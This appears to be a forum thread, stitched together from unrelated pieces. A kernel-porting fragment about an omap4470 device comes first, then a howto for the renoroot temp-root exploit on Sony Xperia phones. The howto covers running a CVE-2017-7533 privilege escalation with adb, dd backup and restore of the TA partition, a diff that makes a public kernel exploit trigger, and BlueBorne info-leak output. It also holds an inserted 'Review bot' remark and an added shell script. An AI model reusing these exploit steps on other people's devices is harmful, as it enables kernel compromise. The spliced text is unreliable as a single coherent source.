Then it hangs. For some reason it fails to detect omap4470es1.0. I'm not an advanced kernel hacker so I seek for suggestions in what direction to move to research the problem. I've also tried "bowser" and "soho" configs, still hangs at the same point. Could it be somehow related with the toolchain version? Should I try another one? Mainline 4.3.3 kernel with dts for pandaboard-es built with gcc 5.2 proceeds to boot much further, but I suppose it'll take too much time to get mainline kernel fully functional on the device, if it is even possible (because of blobs, firmwares etc.).
BTW, it may help if someone posts "dmesg" output of a successful boot of "soho" with stock kernel.
Nope not toolchain. GCC 5.2 result is still the same.
Well, it was quite trivial, I traced that it hangs while mapping lowmem. I have no idea why, but changing `vmalloc` to 496M resolves the issue.
Still need to find out why LCD panel does not work, and we'll have a fully functional 3.4 kernel!
Remember kids, kernel and modules built with significantly different toolchains may be incompatible!
Have it working now. Fire OS 4.5.5 boots up.
Now I have to get touch input working.
UPD: adding "idc" file for touchscreen and setting SELinux to "permissive" helped, still needs calibration, Woohoo working FireOS 4.5.5
Any progress on porting Fire OS after a semi-working touchscreen?

[XZ1c/XZ1/XZp] temp root exploit to backup drm keys implemented

Tools to backup TA partition (drm keys) of Xperia XZ1 Compact
by j4nn
https://j4nn.github.io/
As everyone knows, bootloader unlock via code from sony removes drm keys. That disables certain functions, the most critical one being the camera (outputting only solid green pictures in case of oreo fw).
I've implemented tools that allow to backup the whole TA partition, which contains device master key needed to access sony drm keys and restore the TA after bootloader unlock in order to make the camera (among other things) working again on any sony stock firmware.
In order to be able to use the tools, you need to flash one of the supported firmwares (or be lucky to have the phone already running it).
In case you need to downgrade, please check this thread first.
Anybody who is about to unlock your phone, could you please do so with additional test included?
See post#500 and post#502 for more details.
Additional details in post#515, post#516, post#517 and post#527.
Instructions for the test that I kindly ask anybody who is about to unlock to do are described in the post#520 -- tested already.
Thank you.
ABOUT THE TOOLS
renosploit - rename/notify exploit to get kernelspace read/write, uses multiple vulnerabilities to overcome kaslr, pxn and pan mitigations of android oreo
renotrap - helper application (rename/notify temp root app)
renoshell - get temp root shell by use of kernel space read/write primitives provided by renosploit (sources available here)
renoroot - a shell script to be started from adb, it starts the above tools to get temp root shell
A preview video of the tools in action can be downloaded here: renoroot-preview.zip or watched online here.
As an alternative to renoroot you may use 'bindershell' to get a temp root shell for TA backup - it is available here /added on 2020-02-08/
SUPPORTED TARGETS
(with downloadable firmware links)
Sony Xperia XZ1 Compact (G8441)
47.1.A.2.324_CE1 (initial tested by @tramtrist, this release tested by @tanapoom1234 post#212)
47.1.A.8.49_CE1 (tested by @notaz post#224 and @orsonmmz post#232)
Sony Xperia XZ1 (G8341/G8343)
47.1.A.2.324_CE1 (tested by @HandyMenny post#228)
Sony Xperia XZ1 Dual (G8342)
47.1.A.2.281_CE1 (tested by @Vildanoff post#230)
Sony Xperia XZ1 (SOV36) /added on 2019-08-22/
this Japan version can be flashed with fw for G8431 making it exploitable as standard XZ1 (the possibility to use G8431 fw is confirmed here and also here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
Sony Xperia XZ Premium (G8141)
47.1.A.3.254_CE1 (tested by @DocLM post#227, by @LinFan post#242 and by @steso90 xzp forum post#45)
Sony Xperia XZ Premium Dual (G8142)
47.1.A.3.254_RU (tested by @greatpatel007 xzp forum post#31 and #39)
Sony Xperia XZ Premium (G8188) /added on 2019-04-24/
this Japan version can be flashed with fw for G8141 making it exploitable as standard XZp (tested by zatsune as documented here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
An advice: before flashing anything, enable 'OEM Unlocking' in android developer menu and if flashing a fw for different phone model, skip flashing bootloader (i.e. remove boot/ subdirectory completely before using newflasher). /added on 2019-08-27/
Please note: the temp root exploit (all renoroot tools) are designed only for the above firmware versions (binary kernels builds in them) - there is no chance it would work on other phones or other kernel builds - do not try it, it would not work.
Concerning portability to other targets, the exploit itself needs several vulnerabilities not fixed in a kernel, the primary one is CVE-2017-7533 (race between inotify and rename).
This was patched by google with 2017-12-05 security patch level. That means unless you can flash a firmware with older security patch level, it would not make sense to try to adapt the exploit for a new target (like it is a case with XZ2 Compact device for example).
USING THE TOOLS
Please follow the steps below for an official and up to date guide. If something was not clear enough, you may also check post#382 from @munted for a pdf guide with screenshots possibly containing more details and windows specific hints.
backup everything you need from your phone
flash compatible firmware
Before flashing, you may take a screenshot of service menu -> service tests -> security possibly together with current sw version screen for reference and copy them from the phone to your PC.
You can use newflasher tool from @munjeni and use instructions there to flash the firmware.
The tool should skip dangerous .ta files automatically. You may consider removing Just remove the persist_X-FLASH-ALL-42E5.sin file, which is discussed here to avoid flashing it - as tested by @tanapoom1234, not flashing the persist partition allows to keep the Android Attest Key - check his post#212. /Added on 2019-04-06: The key is not part of TA obviously, it is present in the persist partition, so never flash persist even after TA backup./
/Added on 2019-04-09: When flashing a firmware, be sure to flash its bootloader too (i.e. the whole 'boot' directory needs to be present with all files in it including the .ta there). You might skip appslog, diag, Qnovo and ssd./
In case of downgrade it is needed to flash userdata (and possibly also cache) otherwise you get a boot loop.
Just backup your stuff before downgrade as with downgrade comes a factory reset. In fact I would recommend to do a factory reset just before the downgrade in order to remove the binding to your google account. This way you can avoid going online after the downgrade if used without sim and skipping wifi configuration.
3. prepare your phone
When the phone boots up, try to avoid connecting to internet by selecting only wifi and not configuring any, skipping accounts setup for later.
This may not always be possible - if persist is not flashed, android insists on setup of google account online, also starting downloads for upgrade.
Cancel everything as soon as possible and disable wifi. You may be better not using a data enabled sim card - we try to avoid any updates.
Disable auto updates of both apps and system. Change the theme from animated background to a static one.
Enable developer menu, enable adb and "Stay awake" option. A YouTube video showing the initial setup to prepare for renoroot is available here.
Take a screenshot of service menu -> service tests -> security for reference and copy it from the phone.
Again be sure both wifi and mobile data connection are disabled to avoid any background internet access.
4. install the tools
Unzip renoroot.zip (download it below). Use following adb commands to get the tools to the phone:
Code:
adb push renoroot /data/local/tmp
adb push renoshell /data/local/tmp
adb push renosploit /data/local/tmp
adb install -r renotrap.apk
5. start the tools to get a temp root shell
Use adb shell to get a command line terminal to the phone and use following commands:
Code:
cd /data/local/tmp
chmod 755 reno*
./renoroot
The last command above will start the exploit eventually resulting with a temp root shell (that should be indicated by # char before the cursor).
It may get the phone to reboot in case an overwrite does not hit the wanted shaped heap object.
You may wait few minutes after the phone boots to allow startup processes to settle down in order to avoid timing influence for next trial.
There is a video for example of this step available here.
6. backup your TA partition
When renoroot is successful, you may use following commands in the root shell to backup the trim area partition:
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-locked.img
chown shell:shell TA-locked.img
sync
sync
And then try to read it out from the phone to your PC - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-locked.img
7. unlock phone's bootloader using a code from sony
When you have the TA-locked.img on your PC including screenshots, you may start the official Sony unlock procedure - follow instructions on sony website please.
Added on 2019-04-16: please note, bootloader unlocking is not reversible - it is not possible to re-lock back (restore of TA-locked does not relock the bootloader).
So be prepared to live with the boot up warning screen (can be seen for example in this video).
Again be sure you have the TA-locked.img on your PC before you start unlocking the bootloader - unlock will erase your phone, so it would get lost from /data/local/tmp if not backed up.
In case oem unlocking is grayed out (so you cannot enable it) you need to go online at least once and the option would be accessible then - video here.
After you unlock the bootloader, do not flash anything - just boot the same unmodified fw we used for the temp root.
8. get temp root again to restore TA
Use the same instructions to avoid internet access and updates as described above, configure the few above mentioned options and start renoroot as before.
With the temp root shell, backup the unlocked TA (for future comparisons) and then restore the state from the locked one. You may need to adb push the TA-locked.img back to /data/local/tmp as the unlock erased everything.
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-unlocked.img
chown shell:shell TA-unlocked.img
sync
sync
And then try to read it out from the phone to your PC (and transfer the locked TA back to the phone) - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-unlocked.img
adb push TA-locked.img /data/local/tmp
And using the window with renoshell temp root shell, restore the TA:
Code:
cd /data/local/tmp
dd if=TA-locked.img of=/dev/block/bootdevice/by-name/TA
sync
sync
9. boot up the phone with the current fw and see about the camera if it works or not
You may also document the security screen state by taking a screenshot. Do not forget to transfer it from the phone to PC.
10. flash twrp recovery
Updated on 2019-08-08: please see post#1029 for the latest workflow with the kernels hiding bootloader unlock status.
Updated on 2019-02-10:
Instead of flashing twrp, you may just 'fastboot boot' it if you need it.
Instead of the steps 10. to 13., you may use patched and rooted kernel hiding bootloader unlock available in following forum threads in order to be able to even install FOTA system update
[XZ1c] rooted kernel hiding bootloader unlock with working fota
[XZ1] rooted kernel hiding bootloader unlock with working fota
[XZp] rooted kernel hiding bootloader unlock with working fota
giving you back sony drm functionality that fw disables when it detects unlocked bootloader status. For more details see also post#645 of this thread.
11. OPTIONAL step (only for XZ1c maybe XZ1)
This step is optional and only lightly tested. The idea is that secd detects unlocked bootloader and switches to limited mode even though drm keys are available. This can be seen in the adb logcat with following message:
Code:
E secd : secd_backend_credential_manager.cpp:77 the bootloader is unlocked, use limited functionality
To workaround that, we may use a secd ripped from secd extension by modpunk - just flash attached secd-ignore-unlock.zip at bottom of this post via twrp recovery (do not flash the 'secd extension by modpunk' which is linked here only for reference).
I've analysed, what changes were done in the secd. Also the lib which fixes the missing device key in TA is not needed from the modpunk's package as we have the real valid key there, so I've removed the lib (and the script which would preload it). Therefore it is just about making secd think that bootloader was not unlocked. Thanks to @modpunk for the patched secd and @russel5 for the flashable zip on which the secd-ignore-unlock.zip is based on.
With this, sony updates may start to arrive.
Please note, this would make sony think the phone runs unmodified and still locked fw. OTA updates may restore original secd or fail altogether (due to modified system/vendor/... partitions).
You may boot the phone to see what happens (OTA updates?) - edit: OTA updates did come, but install to be done on reboot failed - tested by @Unbounded, see post#43 and #44 of the attest key thread please - this may confirm the availability of the SOMC Attest Key which may be the key needed to get sony ota updates (just a guess, not sure what exactly this key is used for).
Again, this step is optional and very experimental, maybe better not to apply it (camera works without this step on any stock fw without any change /until sony changes that in some update/).
Update: see post#395 for secd_ignore_unlock for XZ1c for pie from @S-trace - thank you. It works with XZ1 too (see post#396). The patch port for XZp pie is here: attest key thread post#67.
In my opinion all these secd patch variants are hiding the unlocked state only partially. There are other components in the fw that ask about the unlock state. A proper solution for this is the unlock hiding patched kernel linked in the step 10. of this howto.
12. flash a recent stock firmware
In case you wanted the patched secd, flash it again over the flashed fw.
Boot the phone, check functionality, take screenshots.
13. install magisk if rooted phone is what you need ;-)
Follow instructions of latest magisk, it should work without any special actions.
AUTOMATED FULL BACKUP
These are experimental tools (and actually seem not to work in some cases getting truncated files that are useless) to extract most of the partitions from the phone after getting a temp root. It can be used for comparisons/analysis of what unlock changes (download backup-tools.zip at bottom of this post).
You would run backup-setup.bat in windows command prompt first (you may need to adjust the PATH setting to find adb properly) to copy the tools to the phone and setup tcp forwarding for netcat based copying.
Then using adb shell you would do:
Code:
cd /data/local/tmp
./backup-send.sh
and in windows command prompt you would start:
Code:
backup-recv.bat bk-unlocked
and partitions images would be extracted from the phone (for larger ones sparse android image format is used).
Full depth comparison could be achieved by use of these backup tools (obviously needs to be done twice - before and after unlock, changing the target directory name argument of backup-recv.bat).
WHAT WORKS
Here is a quote of post#185 from @tramtrist in this thread describing the results of the initial tests - special thanks to him!
tramtrist said:
I'd like to report in real quick on what's working.
After following @j4nn very clear instructions and backing up/restoring my TA keys I was left with the NOT PROVISIONED messages he mentioned earlier. However this seems to be no problem as after TA-restore my camera works as it did before. I'm also able to use WIDEVINE sites which require that key as well.
After restoring TA I went ahead and flashed the latest UK customized firmware
I then flashed TWRP latest version 3.2.3
I wanted to have root so I flashed Magisk 1.73 and safety net worked without me having to do anything special.
Google Pay could be set up and seems to be using my credit cards just fine.
I didn't flash any custom kernel as stock is just fine for me.
Adaway is working with root without issue.
All-in-all if you follow @j4nn instructions when he's ready to fully release them to the public then I'd say you will be in good shape.
I'd like to thank @j4nn for giving me the chance to finally contribute something concrete to this community. If you're gonna use this you should drop him some cash.
Update: if you follow the links added in step 10. and use "rooted kernel hiding bootloader unlock", it seems you can have all functionality restored including fota system updates while having magisk root with passed safetynet cts. Verified by @notaz in post#14 of the "[XZ1c] rooted kernel hiding bootloader unlock" thread. Thanks.
ACKNOWLEDGEMENTS
Many thanks to following users:
@moofesr - for testing initial kernel builds until proper build procedure had been found, special thanks for his patience when all tests resulted with bootloop
@Raz0Rfail and @moofesr - for testing timing of rename/notify vulnerability with patched kernel
@dosomder (aka zxz0O0) - for his iovyroot
@tramtrist - for initial testing of TA backup, unlock and restore, special thanks for exposing to risk of losing drm if it did not work
@tonsofquestions - for a lot of testing with unlocked-ta-restored phone when I did not have an unlocked phone yet
ThomasKing (not a user on xda) - for his black hat ksma presentation
few other users in this and attest key lost thread here on xda - for some other cve possibilities, ideas and specific tests
DONATIONS
Please note: I had to invest an enormous amount of time (as you can see throughout this thread and also summarized in progress/change log in post#2) to develop these tools, the code is extremely complex (more than 9000 lines of source code) and it was unbelievably hard to debug and get the timing usable.
It would be kind of you if you could consider donating here please:
https://j4nn.github.io/donate/
I would be happy to accept any donation to me as a form of gratitude in case the software helped you to backup your TA (drm keys) before bootloader unlocking.
Thanks.
DOWNLOAD THE TOOLS
See the attached renoroot.zip at bottom of this post.
Please post your experience with using the tools, if it worked and on which phone model (and fw in case of xz1c).
You may include info about how long it took to get a root shell, how many reboots, how many events in the last trial which succeeded with how many overwrites (just one with success is the best, more means previous overwrites did not hit wanted object in shaped heap resulting with possibly unstable system). This info is interesting for statistics, so we all know, how fast can we get a temp root on each device/firmware.
Thanks.
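The howto above stresses having a good TA-locked.img on the PC before the unlock wipes the phone, and notes that the backup tools sometimes produce truncated files. The following is an added example, not part of renoroot or of the original post: a set of checks to run on the PC against the pulled image. The function names are hypothetical, and it assumes the expected size and SHA-256 were recorded on the phone beforehand (for example with `wc -c` and `sha256sum` on /data/local/tmp/TA-locked.img, assuming the phone's toolbox provides `sha256sum`).

```shell
#!/bin/sh
# Added example (not from the original post): sanity checks for a pulled
# partition image such as TA-locked.img. All function names are hypothetical.

# Print the SHA-256 of a file as bare hex.
sha256_of() {
    sha256sum "$1" | awk '{print $1}'
}

# Print the size of a file in bytes.
size_of() {
    wc -c < "$1" | tr -d ' '
}

# Succeed if the file is empty or holds only one repeated byte value
# (all 0x00 or all 0xFF is what an erased or unread dump looks like).
is_blank_image() {
    distinct=$(od -An -v -tx1 "$1" | tr -s ' \n' '\n' | sed '/^$/d' \
               | sort -u | wc -l | tr -d ' ')
    [ "$distinct" -le 1 ]
}

# verify_ta_image <image> <expected_size_bytes> <expected_sha256>
# The expected values are the ones recorded on the phone (assumption).
# Return codes: 0 ok, 1 missing/empty, 2 size mismatch (truncated pull),
#               3 blank content, 4 hash mismatch.
verify_ta_image() {
    img=$1
    want_size=$2
    want_sha=$3

    [ -f "$img" ] || { echo "FAIL: $img not found"; return 1; }

    got_size=$(size_of "$img")
    [ "$got_size" -gt 0 ] || { echo "FAIL: $img is empty"; return 1; }

    if [ "$got_size" != "$want_size" ]; then
        echo "FAIL: size $got_size, expected $want_size (truncated copy?)"
        return 2
    fi

    if is_blank_image "$img"; then
        echo "FAIL: $img contains a single repeated byte value"
        return 3
    fi

    got_sha=$(sha256_of "$img")
    if [ "$got_sha" != "$want_sha" ]; then
        echo "FAIL: sha256 $got_sha does not match the on-device value"
        return 4
    fi

    echo "OK: $img ($got_size bytes, sha256 $got_sha)"
    return 0
}

# ta_diff_count <image_a> <image_b>
# Number of byte positions that differ between two same-sized images,
# e.g. TA-locked.img versus TA-unlocked.img kept "for future comparisons".
ta_diff_count() {
    { cmp -l "$1" "$2" 2>/dev/null || true; } | wc -l | tr -d ' '
}
```

Only proceed to the unlock step when `verify_ta_image` returns 0 for the copy on the PC; keep a second copy of the verified file elsewhere.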
DEVELOPMENT PROGRESS / CHANGE LOG
26-05-2018 started this thread listing vulnerabilities found during many weeks of research done right after buy of my XZ1c phone
06-06-2018 post#7: managed to boot kernel from the 47.1.A.2.281 fw in qemu
16-06-2018 post#25: simple out of bounds overwrite not useful, complex exploiting of use after free needed
02-07-2018 post#33: explained how use after free exploit would work, but timing is impossible: kfree from rcu too late
06-07-2018 post#44 and post#48: more details about exploiting use after free and kfree_rcu too late kfree timing problem
17-07-2018 post#53: first kernel to test timing, did not boot when tried with unlocked xz1c
27-07-2018 post#73: solved the problem with delayed kfree from kfree_rcu, basic inotify/rename proof of concept running in qemu for long filenames
27-07-2018 post#75: found a way to build xz1c kernel from source which can be booted on unlocked xz1c, confirmed the delayed kfree from rcu timing problem
11-08-2018 post#88: extensive testing of timing
20-08-2018 post#104: inotify/rename exploit now works with long filenames, allowing kernel heap (256 bytes slub unit) overflow, overview of next phases of the exploit yet to be implemented
31-08-2018 post#118: implemented mostly arbitrary kernel write _together_ with mostly arbitrary kernel read, first bypass of KASLR but we need to bypass PXN & PAN too
15-09-2018 post#131: found that we will need ROP/JOP gadgets to overcome PXN & PAN oreo mitigations, more details in post#135
22-09-2018 post#137: first arbitrary kernel space read and write proof of concept working in qemu
22-09-2018 post#138: with great timing luck kernel space R/W poc worked on still locked xz1c
05-10-2018 post#146: first backup of my xz1c locked TA done: asking for an unlock-and-TA-restore test volunteer
07-10-2018 post#151: confirmed that BL unlock removed 66667 unit - device master key?
18-10-2018 post#162: exploit not reliable enough for public use yet
22-10-2018 post#165: renoroot preview video, send initial test version to @tramtrist
22-10-2018 post#168: renoroot initial test results - after TA restore camera works, BL remains unlocked
25-10-2018 post#185: more initial test results directly from @tramtrist
28-10-2018 post#199: researched possible uses of various keys from security service menu
03-11-2018 post#206: renoroot temp root including tools and howto for TA partition (drm keys) backup released, put everything on the first page
05-11-2018 post#235: renoroot confirmed working with other phone models
10-11-2018 post#287: ordered a new xz1c just for testing and development work
18-11-2018 post#348: the new xz1c arrived
22-11-2018 post#372: a persistent root from a temp root possibility - but not with selinux
11-12-2018 post#428: possibly the fastest temp root - 6.03 seconds with just 53 events and 1 overwrite
05-01-2019 post#493: explained about TA restore not re-locking bootloader - good for us!
09-01-2019 post#515: intercept BL unlock of xz1c in the middle of the procedure
10-01-2019 post#516: posted few videos to highlight key points when preparing for unlock with backup of TA via renoroot temproot
10-01-2019 post#517: video showing xz1c bl unlock with twrp booted in the middle
11-01-2019 post#520: howto for unlock with the twrp booted in the middle
19-01-2019 post#602: info about test to write dev master key TA unit from the secd process
30-01-2019 post#620: info about TA restore and various drm keys
02-02-2019 post#623: preview of FOTA system update fully installed with unlocked and rooted XZ1c - it confirms all functionality of a locked phone have been restored
05-02-2019 post#633: tested fota system update from oreo to pie - posted a video
10-02-2019 post#645: kernels hiding bootloader unlock released for XZ1c/XZ1/XZp - with locked TA restored this brings root with all locked phone functionality of stock fw restored
16-02-2019 post#652: ported BL unlock hiding patch to TAMA platform for testing with XZ2 (it worked, but cannot be booted via fastboot due to bug in bootloader according to sony /more details here/)
19-02-2019 post#663: patched XZ2 kernel to make it boot via 'fastboot boot' command from usb (tested successfully by @serajr post#664) - shall be useful for twrp setup on TAMA platform (post#668 by @MartinX3)
19-02-2019 post#672: fota system update with my rooted kernels verified with XZ2 phone by @serajr - so we may have fota system update with root on xz2/xz2c/xz2p/xz3 phones too (theoretically)
---->> moved the original opening post in here ----
Downgrade XZ1 Compact to 47.1.A.2.281 firmware version (not sure if this downgrade is safe, see android-attest-key-lost thread here please). The 47.1.A.2.324_CE1 version might be better to try first.
The 2.281 fw results with android security patch level 2017-08-05, kernel 4.4.74, android oreo.
BlueBorne vulnerabilities are not patched yet with this firmware:
CVE-2017-0785 Android information leak vulnerability PoC seems to work - tested myself.
Not sure, but it seems that bluetooth service is not a 32bit process anymore, contrary to the note in BlueBorne whitepaper /The Bluetooth service in Android runs under Zygote (Android service manager), and is surprisingly a 32-bit process (even when the OS and CPU are ARM-64 for instance/ - example of stack dump obtained:
Code:
000000b0 00 00 00 00 ff ff ff fd ff ff ff ff d8 69 f4 80 │····│····│····│·i··│
000000c0 00 00 00 73 e8 60 0c 10 00 00 00 73 e8 60 01 40 │···s│·`··│···s│·`·@│
000000d0 00 00 00 73 d8 6b 20 08 00 00 00 73 e8 69 06 d0 │···s│·k ·│···s│·i··│
...
000007e0 00 00 00 73 2c 32 34 38 72 68 74 20 20 64 61 65 │···s│,248│rht │ dae│
000007f0 65 6d 61 6e 5f 74 62 20 6b 72 6f 77 75 65 75 71 │eman│_tb │krow│ueuq│
00000800 74 73 20 65 65 74 72 61 00 00 00 64 00 00 00 00 │ts e│etra│···d│····│
Those '00 00 00 73' are often present, quite possibly the upper 32bit part of a 64bit pointer. The text at 7e8 may be something like 'thread name bt_workqueue started', possibly indicating the CVE-2017-0785 PoC worked (modified so that 'n = 90' to receive more data).
The first idea was to make the Android BlueBorne exploit working to obtain bluetooth service credentials and use that with some kernel exploit to switch to root in order to finally do TA partition backup (to save DRM keys).
The bluetooth user seems to have the NET_ADMIN capability, that could be very useful.
I've researched further possible kernel exploits and it seems to me that the kernel from 2.281 firmware seems to contain (at least) following vulnerabilities:
CVE-2017-7308 AF_PACKET packet_set_ring
This needs NET_RAW capability, that may be hard to obtain, bluetooth service seems not to have it.
CVE-2017-7533 race between inotify_handle_event() and vfs_rename()
https://exploit.kitploit.com/2017/08/linux-kernel-412-race-condition.html
This may work as a standalone exploit - checked the kernel source - vulnerability is not fixed, not sure about SElinux limitations and other android security mitigations - please discuss this.
Found only demo poc not getting root, but it may be possibly developed to full temp root standalone exploit.
This currently seems to be the most promising.
CVE-2017-1000112 memory corruption in UDP fragmentation offload
https://securingtomorrow.mcafee.com...vilege-escalation-analyzing-cve-2017-1000112/
https://ricklarabee.blogspot.cz/2017/12/adapting-poc-for-cve-2017-1000112-to.html
https://www.exploit-db.com/exploits/43418/
This could be used after BlueBorne done, as it needs NET_ADMIN capability.
HELP NEEDED PLEASE - let's collaborate and develop together the needed exploits!
For example it is hard for me to develop only with a locked device, better debugging may be possible on stock firmware with unlocked bootloader as some modifications may be flashed. My free time is quite limited, so it would be useful to split the work.
----<< moved the original opening post in here ----
It seems that 'CVE-2017-7533 race between inotify_handle_event() and vfs_rename()' is not possible to trigger from adb shell - possibly some android security mitigations/selinux limitation?
Built exploit.c from CVE-2017-7533 with attached CVE-2017-7533-android-build.tar.gz android makefiles, adb pushed to /data/local/tmp:
Code:
G8441:/ $ uname -a
Linux localhost 4.4.74-perf+ #1 SMP PREEMPT Wed Aug 9 16:09:57 2017 aarch64
G8441:/ $ cd /data/local/tmp
G8441:/data/local/tmp $ ./exploit 2>err.log
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����test_dir/bbbb3210321032103210"
alloc_len : 50
callrename done.
G8441:/data/local/tmp $
the notify events seem not to be received
The rename function works in the exploit (tested separately), but many errors such as
rename1: No such file or directory
rename2: No such file or directory
are returned from the exploit though.
The inotify_init1 function returns valid fd, so it looks like everything is ok, but for unknown reason, inotify events are not received.
Running the same code in linux with vulnerable kernel results with this:
Code:
Linux 4.8.0 #1 SMP Tue Oct 25 09:09:01 UTC 2016 x86_64 Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz GenuineIntel GNU/Linux
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100ÿÿ1ÿÿÿÿ"
handle_events() event->name : bbbb32103210321032100ÿÿ1ÿÿÿÿ, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
alloc_len : 50
Note the 'handle_events' log message presence - that indicates receive of inotify event. The rename errors are not returned in this case.
That means even though the kernel is vulnerable (as verified in sony release source code - it is fixed since 47.1.A.12.34 version as can be seen with 'git log --stat -p origin/47.1.A.12.xxx -- fs/dcache.c' in sony's kernel git repository), it looks like we cannot trigger the bug simply from adb shell.
This is what is configured in the kernel (using sony's build instructions):
CONFIG_FSNOTIFY=y
CONFIG_DNOTIFY=y
CONFIG_INOTIFY_USER=y
# CONFIG_FANOTIFY is not set
Am I missing something? Any idea why the bug cannot be triggered?
--previous edit-- 27-05-2018 at 22:58. Reason: added info about rename() on xz1c; added info about inotify_init1() on xz1c; added info about 1st fw version with a fix and relevant kernel config options
It doesn't trigger because the exploit itself is broken:
Code:
@@ -280,7 +280,7 @@ void *callrename( void *ptr )
char enter = 0;
char origname[1024];
char longname[1024];
- char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff";
+ char next_ptr[9] = "\x30\xff\xff\x31\xff\xff\xff\xff";
char prev_ptr[8] = "";
// This value will overwrite the next (struct fsnotify_event)event->list.next
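Review bot: the new size 9 on next_ptr is a bare magic number with nothing saying why it changed. The initializer is exactly 8 bytes, so the old [8] left no room for the terminating NUL and [9] does; a one-line comment stating that would help, or better, declare it as char next_ptr[] = "..." so the compiler sizes the array with the terminator included. The neighbouring prev_ptr[8] = "" is fine as written because its initializer is empty, but it will have the same problem if it is ever given an 8-byte value.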
With that it should work (not tested though).
Elevating through heap/slab overflow is not going to be straightforward though. As the redhat description states, we could redirect the free list pointer to userspace and provoke the kernel to put some function pointers there for us to modify, but as soon as a context switch happens the system will crash and burn. I guess easiest way would be to combine this with some older heap overflow exploit, assuming such thing exists (haven't looked)...
Thanks, your change really made it working:
Code:
G8441:/data/local/tmp $ ./exploit
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
...
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
alloc_len : 50
callrename done.
So this could be a way after all even though not easy.
It has been done already, oreo root exploit is existing and it uses the CVE-2017-7533 (race between inotify and rename) as a starting point. Unfortunately the exploit itself is not released yet.
There are slides explaining basics about the exploit available:
asia-18-WANG-KSMA-Breaking-Android-kernel-isolation-and-Rooting-with-ARM-MMU-features.pdf
It continues even with a lot more interesting second stage exploit which mirrors kernel space memory for user space access using forgotten/overlooked feature of arm page table (address translation) setup.
Not sure when the exploit may be released - they are probably holding it back intentionally.
I guess that it will not be released for a long time because the Kernel Space Mirroring Attack is a totally new vulnerability (probably even without CVE yet). So they wait first for CVE assignment and then wait for google to release a fix and wait even more to allow vendors to deploy it to customers.
There are patches to KSMA being discussed on LKML since May 29th so things are moving on.
There's also a demo of the exploit here: https://youtube.com/watch?v=2zGTEv-iUOY
Managed to boot kernel from the 47.1.A.2.281 fw in qemu - dmesg here:
Code:
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Initializing cgroup subsys cpuset
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Initializing cgroup subsys cpuacct
[ 0.000000] Initializing cgroup subsys schedtune
[ 0.000000] Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
[ 0.000000] Boot CPU: AArch64 Processor [411fd070]
[ 0.000000] Machine: linux,dummy-virt
[ 0.000000] cma: Reserved 16 MiB at 0x00000000bf000000
[ 0.000000] On node 0 totalpages: 524288
[ 0.000000] DMA zone: 8192 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 524288 pages, LIFO batch:31
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv0.2 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: Initializing psci_cpu_init
[ 0.000000] PERCPU: Embedded 21 pages/cpu @ffffffc07efaf000 s47936 r8192 d29888 u86016
[ 0.000000] pcpu-alloc: s47936 r8192 d29888 u86016 alloc=21*4096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1
[ 0.000000] CPU features: enabling workaround for ARM erratum 832075
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 516096
[ 0.000000] Kernel command line: nokaslr androidboot.selinux=permissive
[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.000000] Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)
[ 0.000000] Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)
[ 0.000000] software IO TLB [mem 0xb8a00000-0xbca00000] (64MB) mapped at [ffffffc078a00000-ffffffc07c9fffff]
[ 0.000000] Memory: 1923764K/2097152K available (17918K kernel code, 2652K rwdata, 8904K rodata, 10240K init, 2852K bss, 157004K reserved, 16384K cma-reserved)
[ 0.000000] Virtual kernel memory layout:
[ 0.000000] modules : 0xffffff8000000000 - 0xffffff8008000000 ( 128 MB)
[ 0.000000] vmalloc : 0xffffff8008000000 - 0xffffffbdbfff0000 ( 246 GB)
[ 0.000000] .init : 0xffffff8009c00000 - 0xffffff800a600000 ( 10240 KB)
[ 0.000000] .text : 0xffffff8008080000 - 0xffffff8009200000 ( 17920 KB)
[ 0.000000] .rodata : 0xffffff8009200000 - 0xffffff8009c00000 ( 10240 KB)
[ 0.000000] .data : 0xffffff800a600000 - 0xffffff800a897300 ( 2653 KB)
[ 0.000000] vmemmap : 0xffffffbdc0000000 - 0xffffffbfc0000000 ( 8 GB maximum)
[ 0.000000] 0xffffffbdc0000000 - 0xffffffbdc2000000 ( 32 MB actual)
[ 0.000000] fixed : 0xffffffbffe7fd000 - 0xffffffbffec00000 ( 4108 KB)
[ 0.000000] PCI I/O : 0xffffffbffee00000 - 0xffffffbfffe00000 ( 16 MB)
[ 0.000000] memory : 0xffffffc000000000 - 0xffffffc080000000 ( 2048 MB)
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
[ 0.000000] HMP scheduling enabled.
[ 0.000000] Preemptible hierarchical RCU implementation.
[ 0.000000] RCU dyntick-idle grace-period acceleration is enabled.
